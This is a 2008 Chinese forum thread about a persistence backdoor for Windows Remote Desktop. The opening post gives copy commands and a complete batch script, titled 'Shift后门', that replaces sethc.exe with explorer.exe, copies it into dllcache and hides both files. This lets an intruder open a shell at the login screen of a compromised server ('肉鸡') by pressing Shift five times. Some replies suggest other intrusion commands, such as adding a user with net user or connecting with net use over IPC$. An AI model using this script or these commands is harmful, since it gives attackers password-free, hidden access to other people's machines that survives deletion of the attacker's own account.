51CTO技术论坛 » 网管软件 » 无需输入密码登陆3389远程终端        上一帖     下一帖    查看完整版本

页: [1] 2

鬼剑居士2008-2-14 01:34
无需输入密码登陆3389远程终端

在肉鸡上执行命令

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

以后再连接肉鸡3389,敲5下shift键就可以直接进入了,无需输入密码,只是登陆上去没有任务栏,一直会有密码登陆框,不过够我们做很多事情了,目前win2003测试通过。

似乎2000也可以,XP不行。这两个系统没测试。

不知道有牛人知道是什么道理不.

小道消息:连敲5次shift就自动激活连滞键设置~~也就是自动执行sethc.exe ,你把explorer.exe换成sethc.exe 就是自动执行explorer.exe

Shift后门TT整理版
来源:TT's Blog

将下面的代码保存为tt.bat 然后到主机上运行~后门的启动了~

然后连接对方3389然后连续按5次Shift就能进入盘里了 然后进入c:\windows\system32\cmd.exe

或者建个bat内容为 call cmd.xe 就是系统权限了~管理员把你先的用户删了也不怕~

哇哈哈哈哈~~~
TITLE Shift后门
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门 By:TT 整合 QQ:869293
echo.
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕!
echo.
echo 感谢您使用Shift后门
echo.
echo By:TT QQ: 869293
echo.
echo [url=http://www.hack518.net/]http://www.hack518.net[/url]
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit

sportlife2008-2-14 03:11
真的吗

试试看,不知行不行!

lzwu992008-2-14 03:25
一般win2003都会设置较复杂的密码,采用空连接很难实现远程控制的功能.

jnpk20082008-3-6 22:40
没必要用这个了 这不行啊 !你想当黑客啊 !做梦吧 啊哈哈

xxftak_082008-3-7 01:13
呵呵,

enterhi2008-3-11 13:42
不知行不行

lzhk2008-3-12 05:26
能够执行这个命令的话,那net user user pass /add 这样不是更轻松?

king_szj2008-3-12 05:59
对啊,加用户非常好啊

goodmood2008-4-12 07:48
试试看。。。。

luresea2008-4-13 02:44
不现实

hcd6262008-4-14 06:00
路过,学习中!

youyitian2008-4-14 06:48
嘿嘿,谢谢楼主,先收藏了:)

七月未央2008-4-14 12:33
net use\\IP\IPC$ "password" /user:"administrator"这个需要管理员密码,一般高手都禁掉NETBIOS的,停用adminstrator账号
你如何用这个命令

happycat_no.12008-4-14 13:08
理论上有点道理.
也就是利用了系统的某些快捷键

[[i] 本帖最后由 happycat_no.1 于 2008-4-14 21:11 编辑 [/i]]

liandjia2008-4-15 07:20
试试看。。。。

youyitian2008-4-16 08:24
没必要用这个了 这不行啊 !

lidong86552008-5-5 06:18
没意思```

xingyi2008-5-23 09:42
这个前题是能接触到那台PC,手工操作复制文件,或传播病毒给这台PC。

如果能远程拷贝的话,还要你说的这些做什么,都在直接操作那台PC了~!

⺌﹏龍爺℡﹖2008-5-23 13:54
额,这样也行?

hnfns2008-5-26 03:38
不可能吧.:

maxuefeixw2008-5-27 14:00
呵呵...怎么感觉有点多此一举样的                不过还是顶下楼主
   这个都用到了...

fkesse13142008-5-30 01:17
学习中.....

usernames2008-5-30 05:29
强悍

magiczsh2008-6-3 01:40
似乎只有空密码才能连接,在服务器上这样设置的可能几乎没有吧。

呆木瓜2008-6-10 03:44
真的假的。。。

关键词: 终端       

相关文章:
利用IE登陆windows 2003 的终端服务器
非常好用的超级终端!!!
终端客户机连接问题
在你的Ubuntu Linux桌面上嵌入终端窗口
终端管理软件

查看完整版本: 无需输入密码登陆3389远程终端


Powered by 51CTO.COM